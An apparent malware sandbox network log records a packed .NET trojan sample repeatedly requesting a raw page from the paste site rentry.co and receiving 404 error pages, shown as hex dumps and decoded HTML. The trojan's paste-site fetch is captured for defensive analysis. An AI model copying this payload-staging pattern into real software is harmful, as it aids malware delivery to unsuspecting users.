                                                                                        2024-10-18 10:44:03 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:03 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:44:03 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:03 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 35 30 33 62 33 61 65 39 61 64 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4d 79 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee503b3ae9ad',t:'MTcyOTI0ODI0My4wMDAwMD
                                                                                        2024-10-18 10:44:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        69192.168.2.660728104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:04 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:04 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:04 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FnF3HzOK0LD%2F6CK%2Bz2%2B0kr9KpGZATirtgNsk5%2BDFEdhBh0W0VbQvVcB8v0Nu15iAYlKOLjsKDZmAhgJAMkSLGn6zJfgbLbNXgdGOmBrE7iLpo8NGjKMRfLY%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee58e9dc46e0-DFW
                                                                                        2024-10-18 10:44:04 UTC707INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:04 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:44:04 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:04 UTC1014INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 35 38 65 39 64 63 34 36 65 30 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4e 43 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee58e9dc46e0',t:'MTcyOTI0ODI0NC4w
                                                                                        2024-10-18 10:44:04 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:44:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        70192.168.2.660729104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:05 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:06 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:06 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92Q7ZFB2A8IIUsN6fwnRHTU7QYV21AvKACEl%2FtPxjN4N5YpyF05BA9c0DjcOmFDvSv6fWggV6EKJDlwUkNFYZcZCdeBNNU55IuSkzJZPshJ2F70rENR6GPvLBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee602e1b45fc-DFW
                                                                                        2024-10-18 10:44:06 UTC717INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:06 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:44:06 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:44:06 UTC1004INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 36 30 32 65 31 62 34 35 66 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee602e1b45fc',t:'MTcyOTI0ODI0Ni4wMDAwMDA='}
                                                                                        2024-10-18 10:44:06 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:44:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        71192.168.2.660730104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:06 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:07 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:07 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=68GBNdFbhvVchv6Yg9mLgE3umWAYL70UCccmcAqc30J3cCsNfJ6hzOlBgn0%2FAx3rxoek617%2BtdM9bHaY34%2FghNNzOOxKXBr77Iol%2BhsF3aeMoFo4se%2BjRZ9SIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee67183fe987-DFW
                                                                                        2024-10-18 10:44:07 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:07 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:44:07 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:07 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 36 37 31 38 33 66 65 39 38 37 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4e 79 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee67183fe987',t:'MTcyOTI0ODI0Ny4wMD
                                                                                        2024-10-18 10:44:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        72192.168.2.660731104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:07 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:08 UTC666INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:08 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAodYj%2BjP8AedufSzNG0dfDj0DsQR%2FDoPI7SbYFbxA2xi%2FbKhtWGqzw%2FNbmlszil1YY8OXaS%2Fk3%2BePOzsBLEcZp7hVph6GBNYFThAmIL%2FkfcZ%2ByLnRdiHzz0wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee6d9dd16bf6-DFW
